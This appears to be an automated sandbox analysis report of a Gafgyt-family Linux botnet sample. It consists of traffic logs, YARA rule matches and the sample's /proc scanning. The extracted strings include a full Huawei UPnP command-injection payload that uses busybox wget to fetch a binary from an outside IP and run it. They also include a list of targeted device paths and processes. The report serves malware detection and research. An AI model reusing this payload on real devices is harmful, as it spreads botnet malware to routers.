            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38158
            Source: unknownNetwork traffic detected: HTTP traffic on port 36972 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51168
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51170
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51174
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51172
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41796
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41798
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41792
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41794
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41790
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38140
            Source: unknownNetwork traffic detected: HTTP traffic on port 50824 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38142
            Source: unknownNetwork traffic detected: HTTP traffic on port 57444 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41086 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38144
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51178
            Source: unknownNetwork traffic detected: HTTP traffic on port 53104 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38146
            Source: unknownNetwork traffic detected: HTTP traffic on port 33982 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51176
            Source: unknownNetwork traffic detected: HTTP traffic on port 43796 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38148
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51180
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51184
            Source: unknownNetwork traffic detected: HTTP traffic on port 46786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51182
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41786
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41788
            Source: unknownNetwork traffic detected: HTTP traffic on port 53562 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41782
            Source: unknownNetwork traffic detected: HTTP traffic on port 54454 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33524 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41784
            Source: unknownNetwork traffic detected: HTTP traffic on port 56576 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51108
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51106
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53768
            Source: unknownNetwork traffic detected: HTTP traffic on port 36960 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47678 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44160 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51100
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53762
            Source: unknownNetwork traffic detected: HTTP traffic on port 57420 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53760
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51104
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53766
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51102
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53764
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53770
            Source: unknownNetwork traffic detected: HTTP traffic on port 41074 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50848 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 43326 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37876 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51118
            Source: unknownNetwork traffic detected: HTTP traffic on port 43760 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53774
            Source: unknownNetwork traffic detected: HTTP traffic on port 33536 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51112
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53772
            Source: unknownNetwork traffic detected: HTTP traffic on port 47666 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39264 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51110
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53778
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51116
            Source: unknownNetwork traffic detected: HTTP traffic on port 54466 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53776
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51114
            Source: unknownNetwork traffic detected: HTTP traffic on port 53550 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56564 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56588 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40290 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51704 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53780
            Source: unknownNetwork traffic detected: HTTP traffic on port 47208 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60602 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38190
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51128
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38192
            Source: unknownNetwork traffic detected: HTTP traffic on port 41062 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38194
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38196
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51122
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53784
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38198
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51120
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53782
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51126
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53788
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51124
            Source: unknownNetwork traffic detected: HTTP traffic on port 37888 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53786
            Source: unknownNetwork traffic detected: HTTP traffic on port 50836 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 54008 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53792
            Source: unknownNetwork traffic detected: HTTP traffic on port 57432 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51130
            Source: unknownNetwork traffic detected: HTTP traffic on port 49042 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44172 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33548 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47654 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38180
            Source: unknownNetwork traffic detected: HTTP traffic on port 54478 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38182
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38184
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38186
            Source: unknownNetwork traffic detected: HTTP traffic on port 36502 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53796
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38188
            Source: unknownNetwork traffic detected: HTTP traffic on port 52694 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51134
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53794
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51132
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51138
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53798
            Source: unknownNetwork traffic detected: HTTP traffic on port 60614 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51136
            Source: unknownNetwork traffic detected: HTTP traffic on port 43314 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 43772 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51140
            Source: unknownNetwork traffic detected: HTTP traffic on port 39276 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34404 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49030 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37418 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52682 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33428 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45040 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56540 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34382 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44218 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55718 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40228 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41182 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45904 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 46750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34370 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37406 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55706 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33416 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56552 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40194 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51716 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52670 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34416 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40170 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51188
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51186
            Source: unknownNetwork traffic detected: HTTP traffic on port 43206 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51192
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51190
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51196
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51194
            Source: unknownNetwork traffic detected: HTTP traffic on port 39252 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 46762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 46774 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45064 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51198
            Source: unknownNetwork traffic detected: HTTP traffic on port 34428 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53574 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57540 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42892 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 43218 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50800 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39168 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33512 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39240 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45052 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40182 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45916 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35286 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53586 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44206 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36996 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42880 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41170 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57468 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39156 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42086 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47774 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36646 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53466 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37960 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53454 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50956 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36634 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33850 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42074 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39144 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53902
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53900
            Source: unknownNetwork traffic detected: HTTP traffic on port 50932 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52116 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53906
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53904
            Source: unknownNetwork traffic detected: HTTP traffic on port 36622 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36658 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50968 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42796 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47316 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53908
            Source: unknownNetwork traffic detected: HTTP traffic on port 47786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53914
            Source: unknownNetwork traffic detected: HTTP traffic on port 48630 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53912
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53916
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53910
            Source: unknownNetwork traffic detected: HTTP traffic on port 37972 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56238 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45808 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 48654 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44292 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47328 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52104 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 38276 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41936
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41938
            Source: unknownNetwork traffic detected: HTTP traffic on port 50920 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41932
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41934
            Source: unknownNetwork traffic detected: HTTP traffic on port 42050 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41930
            Source: unknownNetwork traffic detected: HTTP traffic on port 33152 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55660 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41926
            Source: unknownNetwork traffic detected: HTTP traffic on port 42772 -> 443

            System Summary

            barindex
            Source: skyljnee.arm5-20240128-0910.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: 5488.1.00007fc254017000.00007fc254036000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: Process Memory Space: skyljnee.arm5-20240128-0910.elf PID: 5488, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.245.236.146 -l /tmp/linuxxx -r /skyljnee.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: Initial sampleString containing 'busybox' found: /bin/busybox
            Source: Initial sampleString containing 'busybox' found: busybox
            Source: Initial sampleString containing 'busybox' found: HTTP/1.1 200 OKskyljne.armskyljne.arm5skyljne.arm6skyljne.arm7skyljne.mipsskyljne.mpslskyljne.x86_64skyljne.sh4<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.245.236.146 -l /tmp/linuxxx -r /skyljnee.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
            Source: Initial sampleString containing 'busybox' found: Content-Length: /proc//proc/%s/exe/proc/self/exevar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemd/usr/libexec/openssh/sftp-serverusr/shellmnt/sys/bin/boot/media/srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr/bashhttpdtelnetddropbearropbearencodercundi/var/cundi/system/root/dvr_gui//root/dvr_app//var/tmp//anko-app//opt/POST /goform/set_LimitClient_cfg HTTP/1.1
            Source: Initial sampleString containing 'busybox' found: /proc/proc/%d/cmdlinerwgetcurlbusyboxechocatnanolG
            Source: ELF static info symbol of initial sample.symtab present: no
            Source: skyljnee.arm5-20240128-0910.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: 5488.1.00007fc254017000.00007fc254036000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: Process Memory Space: skyljnee.arm5-20240128-0910.elf PID: 5488, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: classification engineClassification label: mal100.troj.linELF@0/1025@24/0
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/1583/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/2672/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/110/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/111/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/112/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/113/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/234/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/1577/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/114/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/235/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/115/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/116/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/117/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/118/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/3751/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/119/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/3752/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/10/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/917/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/11/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/12/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/13/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/14/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/15/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/16/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/17/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/18/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/19/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/1593/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/240/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/120/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/3094/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/121/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/242/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/3406/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/1/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/122/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/243/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/2/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/123/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/244/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/1589/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/3/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/124/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/245/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/1588/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/125/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/4/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/246/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/3402/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/126/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/5/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/247/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/127/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/6/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/248/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/128/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/7/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/249/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/8/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/129/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/800/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/9/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/801/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/803/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/20/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/806/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/21/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/807/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/928/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/22/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/23/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/24/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/25/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/26/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/27/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/28/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/29/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/3420/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/490/cmdlineJump to behavior
            Source: /tmp/skyljnee.arm5-20240128-0910.elf (PID: 5493)File opened: /proc/250/cmdlineJump to behavior
